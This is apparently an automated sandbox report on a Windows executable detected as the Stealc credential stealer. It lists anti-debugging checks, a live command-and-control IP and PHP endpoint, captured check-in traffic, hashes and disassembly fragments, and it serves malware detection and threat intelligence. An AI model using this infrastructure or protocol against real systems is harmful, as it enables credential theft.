                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001B45C0 VirtualProtect ?,00000004,00000100,000000000_2_001B45C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001C9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_001C9860
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001C9750 mov eax, dword ptr fs:[00000030h]0_2_001C9750
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001C7850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_001C7850
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Yara detected Powershell download and execute
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 4480, type: MEMORYSTR
                Searches for specific processes (likely to inject)
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001C9600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_001C9600
                Source: file.exe, file.exe, 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: M/Program Manager
                Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_001C7B90
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001C6920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,0_2_001C6920
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001C7850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_001C7850
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001C7A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_001C7A30

                Stealing of Sensitive Information

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.1b0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2029533452.0000000004B60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2074713980.0000000000ECE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 4480, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Remote Access Functionality

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.1b0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2029533452.0000000004B60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2074713980.0000000000ECE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 4480, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Command and Scripting Interpreter                		1
                DLL Side-Loading                		11
                Process Injection                		1
                Masquerading                		OS Credential Dumping2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		2
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts11
                Native API                		Boot or Logon Initialization Scripts1
                DLL Side-Loading                		33
                Virtualization/Sandbox Evasion                		LSASS Memory641
                Security Software Discovery                		Remote Desktop ProtocolData from Removable Media2
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                Disable or Modify Tools                		Security Account Manager33
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive2
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                Process Injection                		NTDS13
                Process Discovery                		Distributed Component Object ModelInput Capture12
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets1
                Account Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                Obfuscated Files or Information                		Cached Domain Credentials1
                System Owner/User Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                Software Packing                		DCSync1
                File and Directory Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading                		Proc Filesystem324
                System Information Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                file.exe100%AviraTR/Crypt.TPM.Gen
                file.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://185.215.113.37/100%URL Reputationmalware
                http://185.215.113.37100%URL Reputationmalware
                http://185.215.113.37/e2b1563c6670f193.php100%URL Reputationmalware
                http://185.215.113.37/ws100%URL Reputationmalware

                Domains and IPs

                Contacted Domains

                No contacted domains info

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://185.215.113.37/true
                • URL Reputation: malware
                		unknown
                http://185.215.113.37/e2b1563c6670f193.phptrue
                • URL Reputation: malware
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://185.215.113.37file.exe, 00000000.00000002.2074713980.0000000000ECE000.00000004.00000020.00020000.00000000.sdmptrue
                • URL Reputation: malware
                		unknown
                http://185.215.113.37/e2b1563c6670f193.phpt5bfile.exe, 00000000.00000002.2074713980.0000000000F41000.00000004.00000020.00020000.00000000.sdmptrue
                  		unknown
                  http://185.215.113.37/e2b1563c6670f193.phpffile.exe, 00000000.00000002.2074713980.0000000000F26000.00000004.00000020.00020000.00000000.sdmptrue
                    		unknown
                    http://185.215.113.37/wsfile.exe, 00000000.00000002.2074713980.0000000000F26000.00000004.00000020.00020000.00000000.sdmptrue
                    • URL Reputation: malware
                    		unknown
                    http://185.215.113.378file.exe, 00000000.00000002.2074713980.0000000000ECE000.00000004.00000020.00020000.00000000.sdmptrue
                      		unknown
                      http://185.215.113.37/e2b1563c6670f193.php)file.exe, 00000000.00000002.2074713980.0000000000F26000.00000004.00000020.00020000.00000000.sdmptrue
                        		unknown
                        http://185.215.113.37/e2b1563c6670f193.phphfile.exe, 00000000.00000002.2074713980.0000000000F26000.00000004.00000020.00020000.00000000.sdmptrue
                          		unknown
                          http://185.215.113.37/e2b1563c6670f193.php7file.exe, 00000000.00000002.2074713980.0000000000F26000.00000004.00000020.00020000.00000000.sdmptrue
                            		unknown

                            World Map of Contacted IPs

                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs

                            Public IPs

                            IPDomainCountryFlagASNASN NameMalicious
                            185.215.113.37
                            		unknownPortugal
                            		206894WHOLESALECONNECTIONSNLtrue

                            General Information

                            Joe Sandbox version:41.0.0 Charoite
                            Analysis ID:1538175
                            Start date and time:2024-10-20 18:12:10 +02:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 2m 43s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Number of analysed new started processes analysed:2
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:file.exe
                            Detection:MAL
                            Classification:mal100.troj.evad.winEXE@1/0@0/1
                            EGA Information:
                            • Successful, ratio: 100%
                            HCA Information:
                            • Successful, ratio: 80%
                            • Number of executed functions: 19
                            • Number of non-executed functions: 85
                            Cookbook Comments:
                            • Found application associated with file extension: .exe
                            • Stop behavior analysis, all processes terminated

                            Warnings

                            • Exclude process from analysis (whitelisted): dllhost.exe
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            • VT rate limit hit for: file.exe

                            Simulations

                            Behavior and APIs

                            No simulations

                            Joe Sandbox View / Context

                            IPs

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            185.215.113.37file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            file.exeGet hashmaliciousStealc, VidarBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            file.exeGet hashmaliciousStealc, VidarBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            file.exeGet hashmaliciousStealc, VidarBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37/e2b1563c6670f193.php

                            Domains

                            No context

                            ASNs

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37
                            file.exeGet hashmaliciousStealc, VidarBrowse
                            • 185.215.113.37
                            file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                            • 185.215.113.16
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37
                            file.exeGet hashmaliciousStealc, VidarBrowse
                            • 185.215.113.37
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37
                            file.exeGet hashmaliciousStealc, VidarBrowse
                            • 185.215.113.37
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37

                            JA3 Fingerprints

                            No context

                            Dropped Files

                            No context

                            Created / dropped Files

                            No created / dropped files found

                            Static File Info

                            General

                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Entropy (8bit):7.947964898540884
                            TrID:
                            • Win32 Executable (generic) a (10002005/4) 99.96%
                            • Generic Win/DOS Executable (2004/3) 0.02%
                            • DOS Executable Generic (2002/1) 0.02%
                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                            File name:file.exe
                            File size:1'869'824 bytes
                            MD5:ffb497d86a175802a94beb58ef45bcbf
                            SHA1:16e0858579f97e8efaf3adc83eb9c445848f2c81
                            SHA256:fecb47b6a0108dd26752fed4b29cf8f4d2b8833e07a2b7300e9fbe3047763d4d
                            SHA512:f65ba34f4500dcb2ac68d7f87ab8fddf796214dba26a00c94e58fac1e075181df332862d77e0b0580cf403cb97bf88871e26f7738e1b62f9e9d64cba231f3e74
                            SSDEEP:24576:/QRGcv882kYDimLE5JwzBRUYYDDaF0eYl7cf4tGFxcro19iVWuKQycMUV2J3TVu2:/61rmLqJkVYDqB2cQLciVWuKQycnkD
                            TLSH:7485337001AF3A72E6A1DD3F1ACF1E9A5AF45FE1B9C2EAC84469CE4094D466BC64C074
                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........

                            File Icon

                            Icon Hash:00928e8e8686b000

                            Static PE Info

                            General

                            Entrypoint:0xaaa000
                            Entrypoint Section:.taggant
                            Digitally signed:false
                            Imagebase:0x400000
                            Subsystem:windows gui
                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                            DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                            Time Stamp:0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:
                            OS Version Major:5
                            OS Version Minor:1
                            File Version Major:5
                            File Version Minor:1
                            Subsystem Version Major:5
                            Subsystem Version Minor:1
                            Import Hash:2eabe9054cad5152567f0699947a2c5b

                            Entrypoint Preview

                            Instruction
                            jmp 00007F2398B38D8Ah
                            pcmpgtd mm3, qword ptr [eax+eax]
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            jmp 00007F2398B3AD85h
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al

                            Rich Headers

                            Programming Language:
                            • [C++] VS2010 build 30319
                            • [ASM] VS2010 build 30319
                            • [ C ] VS2010 build 30319
                            • [ C ] VS2008 SP1 build 30729
                            • [IMP] VS2008 SP1 build 30729
                            • [LNK] VS2010 build 30319

                            Data Directories

                            NameVirtual AddressVirtual Size Is in Section
                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IMPORT0x25d0500x64.idata
                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x25d1f80x8.idata
                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                            Sections

                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                            0x10000x25b0000x228003e2ca9e7db4c07aeabc305e79f1a7483unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .rsrc 0x25c0000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .idata 0x25d0000x10000x200c60c4959cc8d384ac402730cc6842bb0False0.1328125data0.9064079259880791IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            0x25e0000x2a80000x200f3551077d7e06023a0c25bb281ba0501unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            qluozxrq0x5060000x1a30000x1a26007a1c6939b19d203263e5f964ac4db5e5False0.9947801902823424data7.954062792540728IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            pbwitchi0x6a90000x10000x4006bd5d3d8d9ab77b04d4a5fa285001dc9False0.7978515625data6.187769288853959IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .taggant0x6aa0000x30000x2200cd1cb53ee2a0c9b3ed4f6a7ef7e0b827False0.006433823529411764DOS executable (COM)0.019571456231530684IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                            Imports

                            DLLImport
                            kernel32.dlllstrcpy

                            Network Behavior

                            Suricata IDS Alerts

                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                            2024-10-20T18:13:03.918563+02002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.549704185.215.113.3780TCP

                            Network Port Distribution

                            TCP Packets

                            TimestampSource PortDest PortSource IPDest IP
                            Oct 20, 2024 18:13:02.378359079 CEST4970480192.168.2.5185.215.113.37
                            Oct 20, 2024 18:13:02.383368015 CEST8049704185.215.113.37192.168.2.5
                            Oct 20, 2024 18:13:02.383440018 CEST4970480192.168.2.5185.215.113.37
                            Oct 20, 2024 18:13:02.385953903 CEST4970480192.168.2.5185.215.113.37
                            Oct 20, 2024 18:13:02.390872002 CEST8049704185.215.113.37192.168.2.5
                            Oct 20, 2024 18:13:03.541081905 CEST8049704185.215.113.37192.168.2.5
                            Oct 20, 2024 18:13:03.541276932 CEST4970480192.168.2.5185.215.113.37
                            Oct 20, 2024 18:13:03.553634882 CEST4970480192.168.2.5185.215.113.37
                            Oct 20, 2024 18:13:03.558427095 CEST8049704185.215.113.37192.168.2.5
                            Oct 20, 2024 18:13:03.918371916 CEST8049704185.215.113.37192.168.2.5
                            Oct 20, 2024 18:13:03.918562889 CEST4970480192.168.2.5185.215.113.37
                            Oct 20, 2024 18:13:06.720499039 CEST4970480192.168.2.5185.215.113.37

                            HTTP Request Dependency Graph

                            • 185.215.113.37

                            HTTP Packets

                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            0192.168.2.549704185.215.113.37804480C:\Users\user\Desktop\file.exe
                            TimestampBytes transferredDirectionData
                            Oct 20, 2024 18:13:02.385953903 CEST89OUTGET / HTTP/1.1
                            Host: 185.215.113.37
                            Connection: Keep-Alive
                            Cache-Control: no-cache
                            Oct 20, 2024 18:13:03.541081905 CEST203INHTTP/1.1 200 OK
                            Date: Sun, 20 Oct 2024 16:13:03 GMT
                            Server: Apache/2.4.52 (Ubuntu)
                            Content-Length: 0
                            Keep-Alive: timeout=5, max=100
                            Connection: Keep-Alive
                            Content-Type: text/html; charset=UTF-8
                            Oct 20, 2024 18:13:03.553634882 CEST412OUTPOST /e2b1563c6670f193.php HTTP/1.1
                            Content-Type: multipart/form-data; boundary=----IIJKJDAFHJDHIEBGCFID
                            Host: 185.215.113.37
                            Content-Length: 211
                            Connection: Keep-Alive
                            Cache-Control: no-cache
                            Data Raw: 2d 2d 2d 2d 2d 2d 49 49 4a 4b 4a 44 41 46 48 4a 44 48 49 45 42 47 43 46 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 39 45 46 35 36 43 37 46 41 33 43 32 30 30 32 32 39 35 36 32 30 0d 0a 2d 2d 2d 2d 2d 2d 49 49 4a 4b 4a 44 41 46 48 4a 44 48 49 45 42 47 43 46 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 49 49 4a 4b 4a 44 41 46 48 4a 44 48 49 45 42 47 43 46 49 44 2d 2d 0d 0a
                            Data Ascii: ------IIJKJDAFHJDHIEBGCFIDContent-Disposition: form-data; name="hwid"49EF56C7FA3C2002295620------IIJKJDAFHJDHIEBGCFIDContent-Disposition: form-data; name="build"doma------IIJKJDAFHJDHIEBGCFID--
                            Oct 20, 2024 18:13:03.918371916 CEST210INHTTP/1.1 200 OK
                            Date: Sun, 20 Oct 2024 16:13:03 GMT
                            Server: Apache/2.4.52 (Ubuntu)
                            Content-Length: 8
                            Keep-Alive: timeout=5, max=99
                            Connection: Keep-Alive
                            Content-Type: text/html; charset=UTF-8
                            Data Raw: 59 6d 78 76 59 32 73 3d
                            Data Ascii: YmxvY2s=


                            Statistics

                            CPU Usage

                            Click to jump to process

                            Memory Usage

                            Click to jump to process

                            High Level Behavior Distribution

                            Click to dive into process behavior distribution

                            System Behavior

                            General

                            Target ID:0
                            Start time:12:12:59
                            Start date:20/10/2024
                            Path:C:\Users\user\Desktop\file.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\Desktop\file.exe"
                            Imagebase:0x1b0000
                            File size:1'869'824 bytes
                            MD5 hash:FFB497D86A175802A94BEB58EF45BCBF
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.2029533452.0000000004B60000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2074713980.0000000000ECE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                            Reputation:low
                            Has exited:true

                            Disassembly

                            Reset < >

                              Execution Graph

                              Execution Coverage:8%
                              Dynamic/Decrypted Code Coverage:0%
                              Signature Coverage:9.7%
                              Total number of Nodes:2000
                              Total number of Limit Nodes:24
                              execution_graph 13592 1c69f0 13637 1b2260 13592->13637 13616 1c6a64 13617 1ca9b0 4 API calls 13616->13617 13618 1c6a6b 13617->13618 13619 1ca9b0 4 API calls 13618->13619 13620 1c6a72 13619->13620 13621 1ca9b0 4 API calls 13620->13621 13622 1c6a79 13621->13622 13623 1ca9b0 4 API calls 13622->13623 13624 1c6a80 13623->13624 13789 1ca8a0 13624->13789 13626 1c6b0c 13793 1c6920 GetSystemTime 13626->13793 13628 1c6a89 13628->13626 13630 1c6ac2 OpenEventA 13628->13630 13632 1c6ad9 13630->13632 13633 1c6af5 CloseHandle Sleep 13630->13633 13636 1c6ae1 CreateEventA 13632->13636 13634 1c6b0a 13633->13634 13634->13628 13636->13626 13990 1b45c0 13637->13990 13639 1b2274 13640 1b45c0 2 API calls 13639->13640 13641 1b228d 13640->13641 13642 1b45c0 2 API calls 13641->13642 13643 1b22a6 13642->13643 13644 1b45c0 2 API calls 13643->13644 13645 1b22bf 13644->13645 13646 1b45c0 2 API calls 13645->13646 13647 1b22d8 13646->13647 13648 1b45c0 2 API calls 13647->13648 13649 1b22f1 13648->13649 13650 1b45c0 2 API calls 13649->13650 13651 1b230a 13650->13651 13652 1b45c0 2 API calls 13651->13652 13653 1b2323 13652->13653 13654 1b45c0 2 API calls 13653->13654 13655 1b233c 13654->13655 13656 1b45c0 2 API calls 13655->13656 13657 1b2355 13656->13657 13658 1b45c0 2 API calls 13657->13658 13659 1b236e 13658->13659 13660 1b45c0 2 API calls 13659->13660 13661 1b2387 13660->13661 13662 1b45c0 2 API calls 13661->13662 13663 1b23a0 13662->13663 13664 1b45c0 2 API calls 13663->13664 13665 1b23b9 13664->13665 13666 1b45c0 2 API calls 13665->13666 13667 1b23d2 13666->13667 13668 1b45c0 2 API calls 13667->13668 13669 1b23eb 13668->13669 13670 1b45c0 2 API calls 13669->13670 13671 1b2404 13670->13671 13672 1b45c0 2 API calls 13671->13672 13673 1b241d 13672->13673 13674 1b45c0 2 API calls 13673->13674 13675 1b2436 13674->13675 13676 1b45c0 2 API calls 13675->13676 13677 1b244f 13676->13677 13678 1b45c0 2 API calls 13677->13678 13679 1b2468 13678->13679 13680 1b45c0 2 API calls 13679->13680 13681 1b2481 13680->13681 13682 1b45c0 2 API calls 13681->13682 13683 1b249a 13682->13683 13684 1b45c0 2 API calls 13683->13684 13685 1b24b3 13684->13685 13686 1b45c0 2 API calls 13685->13686 13687 1b24cc 13686->13687 13688 1b45c0 2 API calls 13687->13688 13689 1b24e5 13688->13689 13690 1b45c0 2 API calls 13689->13690 13691 1b24fe 13690->13691 13692 1b45c0 2 API calls 13691->13692 13693 1b2517 13692->13693 13694 1b45c0 2 API calls 13693->13694 13695 1b2530 13694->13695 13696 1b45c0 2 API calls 13695->13696 13697 1b2549 13696->13697 13698 1b45c0 2 API calls 13697->13698 13699 1b2562 13698->13699 13700 1b45c0 2 API calls 13699->13700 13701 1b257b 13700->13701 13702 1b45c0 2 API calls 13701->13702 13703 1b2594 13702->13703 13704 1b45c0 2 API calls 13703->13704 13705 